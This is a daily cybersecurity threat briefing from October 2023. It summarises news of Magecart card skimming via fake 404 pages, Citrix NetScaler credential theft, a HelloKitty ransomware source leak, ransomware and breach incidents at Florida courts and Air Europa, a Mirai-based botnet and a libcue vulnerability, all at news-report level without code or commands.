Cyware Daily Threat Intelligence

Daily Threat Briefing • Oct 10, 2023
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Oct 10, 2023
Magecart actors are evolving their tactics, posing a constant threat to online businesses and customer data security. Attackers were spotted recently using fake 404 error pages on online retailer websites to hide malicious code and steal users’ credit card information. Magento and WooCommerce site users are primarily at risk. An opportunistic, global threat campaign also came to light that extracts credentials by exploiting Citrix NetScaler gateways affected by an already-patched security vulnerability. So far, attackers have compromised over 600 unique victim IP addresses, mostly in the U.S. and Europe.
Another ransomware source code leak hits the cybercrime world! A threat actor has leaked the source code for a HelloKitty ransomware variant on a Russian-speaking forum. The availability of source code may enable other adversaries to create their own unique versions of the ransomware.
Florida state courts suffer ??ransomware attack
The ALPHV (BlackCat) ransomware group claimed responsibility for an attack that disrupted state courts across Northwest Florida, impacting the First Judicial Circuit. The threat actors allegedly accessed personal data, including SSNs and CVs of court employees, including judges. They also claim to possess a network map of the court's systems and credentials. The Circuit has been listed on the leak site of the threat actor.
Airline customers advised to remove credit cards
Spanish airline Air Europa has advised its customers to cancel their credit cards following a cyberattack that targeted its online payment system. The company did not disclose the number of affected customers or the timing of the attack. While Air Europa stated that there is no evidence the breach led to fraud, it recommended that customers cancel and replace any bank cards used on its website to prevent potential fraudulent use.
Magecart campaign exploits 404 error pages
A new card skimming campaign discovered by Akamai utilizes 404 error pages on online retailers' websites to hide malicious code and steal customers' credit card information. The attackers manipulate the default ‘404 Not Found’ page to conceal the malicious code within the HTML or first-party scripts, making it challenging to detect. The stolen data is exfiltrated via seemingly benign image requests, thus evading network monitoring tools.
HelloKitty ransomware source code leaked
The source code for the initial version of the HelloKitty ransomware has been leaked by a threat actor known as 'kapuchin0' (also associated with the alias 'Gookee') on a Russian-speaking hacking forum. The actor claims to be developing a more powerful encryptor. HelloKitty is a human-operated ransomware operation known for hacking corporate networks, stealing data, and encrypting systems. The release of ransomware source code can potentially give rise to further threats, as seen with previous cases like HiddenTear and Babuk.
IZ1H9 Mirai-based DDoS campaign goes wild
Security experts with Fortinet laid bare an IZ1H9 attack campaign that exhibited aggressive updates to its exploit arsenal, targeting vulnerabilities in devices from various providers, including D-Link, Netis, Sunhillo SureLine, Geutebruck, Yealink, Zyxel, TP-Link Archer, Korenix JetWave, and TOTOLINK. The Mirai-based DDoS campaign leverages multiple CVEs to infect vulnerable devices and expands its botnet through the use of recently released exploit code.
Citrix flaw abused for credential harvesting
Threat actors are reportedly exploiting a critical vulnerability, tracked as CVE-2023-3519, in Citrix NetScaler ADC and Gateway devices. This flaw allows attackers to insert malicious scripts into authentication pages to steal user credentials. IBM X-Force discovered the campaign, wherein attackers triggered the vulnerability, deployed a web shell, and modified NetScaler Gateway login pages to collect usernames and passwords. The campaign has been active for nearly two months.
libcue bug in GNOME Linux systems
A security flaw (CVE-2023-43641) in the libcue library, affecting GNOME Linux systems, has been disclosed. This vulnerability can lead to RCE when a victim clicks on a malicious link and downloads a .cue file. The flaw arises from an out-of-bounds array access in the track_set_index function of libcue, which is used by Tracker Miners for parsing cue sheet files. By exploiting this vulnerability, attackers can achieve one-click RCE on GNOME systems.